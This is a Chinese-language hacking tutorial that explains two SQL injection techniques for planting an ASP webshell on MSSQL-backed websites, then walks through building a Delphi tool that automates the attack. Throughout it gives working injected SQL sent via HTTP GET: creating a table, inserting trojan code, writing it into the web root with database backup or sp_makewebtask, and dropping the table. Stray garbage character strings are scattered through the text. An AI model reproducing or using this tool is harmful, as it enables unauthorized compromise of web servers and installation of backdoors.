SQL注入得到WEBSHELL

韩冰

<>一．通过SQL注入得到WEBSHELL的原理:
3 ^& d- z+ d& @6 b" _N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。
分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来，设想数据库中有&lt;%%&gt;之类的ASP标实符，导出文件，文件名以.ASP的形式保存。然后文件又保存在WEB的路径下。那么这个导出的ASP文件是不是要去解释&lt;%%&gt; 之内的语句呢？如果数据库中有的表中有&lt;%%&gt;标实符，并且这之中有错误，那么我们导出来生成的ASP文件也会有误。不过，这种机会也不太大。
再来看看CZY的方法吧。
CZY的方法：前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了扩展存储过程——sp_makewebtask。这个扩展存储过程的作用就是：可以把MSSQL数据库中的某个表中的记录导出来，以文件的方法保存起来。这种方法就不会出现什么问题原因在于：我们只去读表中的某个字段中的值。把字段的信息导出来生成文件。这个字段中的值都是我们刚加上的。自己在加入数据的时候，先调试一下，没有问题在加入进去，导出来就当然没有问题了。
( ~% Q6 N6 q9 t1 \  t/ z  k以上两位的方法，我都手工测试过。利用SQL注入漏洞，建表，向表中加数据，然后再导出数据，再删除表。都是利用的SQL语句。这里我就不多说了，大家可以看本期的文章。
二．利用DELPHI去实现功能的前言
+ Z/ Y4 m/ K. W, I( _* G, o& z) K* r原理都分析过了。我们怎么利用DELPHI来实现他们的手工操作呢？其实方法是非常简单的。DELPHI提供了一个NMHTTP控件。我们利用这个控件就可以向某个特定的URL提交参数。然后实现我们的自动注射功能。我马上要为大家讲解的这个程序，有一个特点。也可以说成是一个缺陷吧。程序不去自动猜解WEB的绝对路径。程序不去判断当前连接SQL数据库的当前账号的权限。我为什么要这么做？因为得到这两者用SQL注入是非常难得到的。所以，我们程序发送命令就不会考虑太多。成不成功你执行完自己去看看生成没有就OK了。
/ z% _* n# G& Z+ m
三．如何利用DELPHI得到WEBSHELL。
4 Z/ ?$ I. \6 r+ D4 `2 c程序中用到的值。我们这里来看看有哪些：URL路径，远程WEB绝对路径(通过其他方法得到,你一定有办法的) 采用什么方法去得到WEBSHELL(也就是两位的方法，你选哪一种)。我们同时要求点击一个按纽开始执行命令，和点击一个按纽来终止命今。最后就是新建的表的名称，以及表的字段名称，再次就是字段的类型。前面的我们在程序中放上输入，选择之类的控件就行了。后面的我们设一个选项按纽点按纽弹出相应设置。再把这些相应的设置用一个RECORD来保存。
" y9 v' r/ _3 F- f5 |首先，我们在DIT控件。名称分别是：UrlET //URL路径的输入框、ShellPathET //远程木马的位置、CustomBdoorET//自定义木马的位置。再放两个RadioButton用来选择采用什么方式获取WEBSHELL。CAPTION分别取名为： BackUP DataBase 和 WEB作业。然后再放三个SpeedButtion按纽。名称分别是：设置，开始，停止, 最后再放一个MEMO控件。来显示当前添加的信息。到此界面上的工作就做完了。界面如图：

+ m/ _7 k  i$ H, S$ z( E
3 x/ C+ y9 D7 h+ |2 O4 O9 W3 l6 r
现在来写程序了。
! S# z) F  K3 @% x& q. [* {: q我们首先定义一个RECORD。
如下：
Type
( r+ g: h# c* _+ R# z$ w* D' iSetOption = Record
+ X) p0 U9 A# h$ I3 kTableName : String; //用来保存要创建的表名.
& q9 a: Y9 z! i' O* @' @FieldName : String; //用来保存要创建的字段名.
6 C' v/ ^6 q4 P$ e, c6 }' R2 y/ ~FiledType : String; //用来保存创建的字段名类型.
End;
- e, }8 N# @- O& d* ^4 ZFiledType字段类型的值是以下类型的一种：
& b, {' V' C, }- x& F7 U2 x# I, y1 ABigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
7 {: O  t$ I( |9 d( [) sSmallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 这些都是MSSQL字段类型值.
再定义一个全局变量：
Var
ISStop : Boolean; //用来判断用户是否按下了停止按纽.
好了。在表单创建的过程中，我们为RECORD记录输入默认值.
' C3 R: A" l! Y( {5 }代码如下：
/ Z! l/ b+ L- y; b; Kprocedure TMainForm.FormCreate(Sender: TObject);
begin
; L/ e/ \( t  Y; r4 z0 g# _sOption.TableName :='cyfd'
sOption.FieldName :='gmemo'
sOption.FiledType :='text'
end;
现在我们添加开始执行命令的代码。
) r1 \2 H0 _  P, G+ A1 H1 B& O" L" y- V先定义BDoorList 为TstringList。主要目的就是把木马的内容加进来.
创建两个变量来保存urlET.和ShellPathET的值.方便程序简化调用.
在程序开始执行前,我们得先检查一下用户的输入
定义一个Checkinput函数.
; E3 x! T0 a( y1 Y如下：
( R8 H4 k% f+ U7 I2 q" O" X/ K4 u. ?/ ^Function CheckInput : Boolean;
Begin
Result := False;
' f; A2 J) e: Nif Trim(urlet.Text) = '' then
0 d( N( W( o% ^" [2 w! iBegin
Application.MessageBox('请输入URL地址!','提示',mb_ok+mb_iconinformation);
Exit;
4 L- Q+ @& \. N  S. VEnd;
if Trim(ShellPathET.Text) = '' then
Begin
# t% s4 G% P+ @8 c5 MApplication.MessageBox('请输入文件保存地址!','提示',mb_ok+mb_iconinformation);
3 J5 I; x( L9 ~+ Z$ [  N4 u3 JExit;
End;
IF DefBDoor.Checked then
1 \) |$ Q$ w+ J1 f$ q, v3 fBegin
if Not FileExists(extractfilepath(Application.ExeName)+'默认木马.txt') then
) R* @, i" c. {! BBegin
Application.MessageBox('没有找到 [默认木马.txt] 文件!','提示',mb_ok+mb_iconinformation);
8 u# l: Y. [* n6 SExit;
End;
End
Else
if Not FileExists(CustomBdoorET.Text) then
9 }5 I+ n  t8 Y: @6 J0 r, U& wBegin
Application.MessageBox('没有找到所选的木马文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
4 d: l# M. ?  Q4 @3 d3 K7 vResult := True;
End;
$ }$ [1 b: ?) i) p: N在最开始加入:
( ]1 N" ^3 H4 [, l* B; BIF Not CheckInput then Exit; //如果输入不合法就退出过程.
好了，如果用户输入没什么错，我们就来下面的代码。
首先我们把IsStop设为假。创建BdoorList。
BDoorList := TstringList.Create;
9 \# R1 C0 h$ G7 w4 i再加木马内容到BDoorlist.
BDoorList.LoadFromFile(CustomBdoorET.text);
8 c/ D6 u6 b, B0 f) t7 z好了,在这里我还要给大家说一下：用NMHTTP提交数据的时候.要把输入的一些特别符号转达成编码。我们这里要把空格和%符号替换成相应的编码分别是:%20和%25，不然.程序加不进数据。
代码如下：
BDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
  A; v8 b: K6 T; QBDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
3 {* o( O1 Z5 ?4 D接下来.我们就提交建表的功能了.
) ]1 U0 ]+ W3 DMemo.Lines.Add('建表...');
Memo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
这样我们就创建了一个表。然后.我们向表中加记录:
9 q7 H2 F, O! H代码如下:
6 ?$ e; k$ I$ @7 o3 ~$ `- B) ~Memo.Lines.Add('加数据...');
Memo.Lines.Add('');
# P6 l3 l* ]* R* L) o" ^) aFor i:=0 to BDoorList.Count-1 do //这里用一个循环把木马的内容加进表中去.
Begin
IF IsStop then //这里如果点了停止按纽程序将终止任务.
+ d, `8 [# n; s5 z2 K; jBegin
BDoorList.Free;
Exit;
/ p1 [3 x' Q3 N: S( CEnd; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
7 Y1 ^/ r) [* FMemo.Lines.Add('Add Line '+Inttostr(i+1));
: J$ z$ \4 |" u+ l! VEnd;
现在就是导出数据生成木马了.
8 i8 J+ m3 i) n+ P# ]! }Memo.Lines.Add('导出数据...');
Memo.Lines.Add('');
IF BKData.Checked then //如果选中采用备份数据就执行下面的命令.
3 b9 }) |3 }8 d5 D; C: @3 FNMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
* }9 C1 A  D7 c  a% A$ ~Else //如果是用WEB作业的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我们再删除刚建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
  O/ }. _* a/ b+ C+ o这样我们的任务就完成了。下面来释放变量.
% l0 ~' X. ^$ s7 r" C/ E, f8 GBDoorList.Free;
再来向停止按纽中添加点击事件：
) D1 K0 f+ m' A- H% K) Z6 d9 b+ Y4 W5 j一行代码就行了：IsStop := True;
2 W# S- e/ G% X到这里主表单的内容基本上完成了。现在我们来看设置表单中怎么来设置.其实非常简单.主表单中已经定义了一个RECORD.我们只需要将用户输入的新值，再次赋给RECORD就行了。
设置表单中先引用主表单.然后在界面中添加二个EDIT控件：
, u. Q9 y6 C- G1 I9 b5 z, J$ X第一个名称为：TableNameET //保用户输入的存临时表
, T+ V: W% b# e第二个名称为：FieldNameET //用来保存用户输入的字段名.
再添加一个Combobox　//用来保存用户所选的字段类型值.
+ r0 z9 t3 v" X* C  T2 {名称：FieldTypeCombox
# U. v- Q. O# cOK.界面如下：
$ ?- V$ C* p3 e
代码如下:
7 q/ D) P) d7 T) ~6 S定义一个过程,主表单好调用这个设置。
Procedure ShowSet;
- P, ^+ [# u- Z! }' A" yBegin
Application.CreateForm(TSetForm,SetForm);
: u* r9 @% k$ D% Z. C. CWith SetForm do
4 o( X- {( x1 M; p$ vBegin
TableNameET.Text := sOption.TableName;
FieldNameET.Text := sOption.FieldName;
* F/ X' w7 P6 h7 }" @% J) O& QFieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
5 e& i2 f' v8 y5 I; `# q% V1 ?# vEnd;
6 w  M- g/ {0 @5 n, mSetForm.ShowModal;
) a' t* d% f, tSetForm.Free;
. ]  b. ?# S' G6 `9 i7 K# \5 ], OEnd;
在主表单中设置的点击事件中添加上showset过程就行了。
" U: w) W& `1 h7 Y8 U5 ]/ m下面就是点击确定的代码了。
% B  p' {* D: h6 u: oIF CheckInput then
Begin
sOption.TableName := Trim(TableNameET.Text); //把用户的输入赋给RECORD.
sOption.FieldName := Trim(FieldNameET.Text);
sOption.FiledType := FieldTypeCombox.Text;
Close;
End;
. U  m! k' w1 b# v' Z9 B! `# N这里又有一个CheckInput主要就是检查用户输入的值是不是合法。
代码如下:
Function CheckInput : Boolean;
Begin
Result := False;
& q0 |; r8 _  e7 kIF Trim(TableNameET.Text)='' then
9 l8 D6 A' T3 Z8 ~# X! S4 S9 ]' YBegin
; N4 h% g# T, ~Application.MessageBox('请输入临时表名!','提示',mb_ok+mb_iconinformation);
$ B1 e# D( y  I: ]0 S. g- [% OExit;
End;
+ Z+ ]" r" `# D! N, IIF Trim(FieldNameET.Text)='' then
' R4 j0 c/ z/ G- L' ^  j( g- fBegin
( {- H. c; _1 P8 b8 lApplication.MessageBox('请输入字段名!','提示',mb_ok+mb_iconinformation);
Exit;
6 Q- _% H" y! b# a9 REnd;
Result := True;
End;
到这里程序就完了。</P>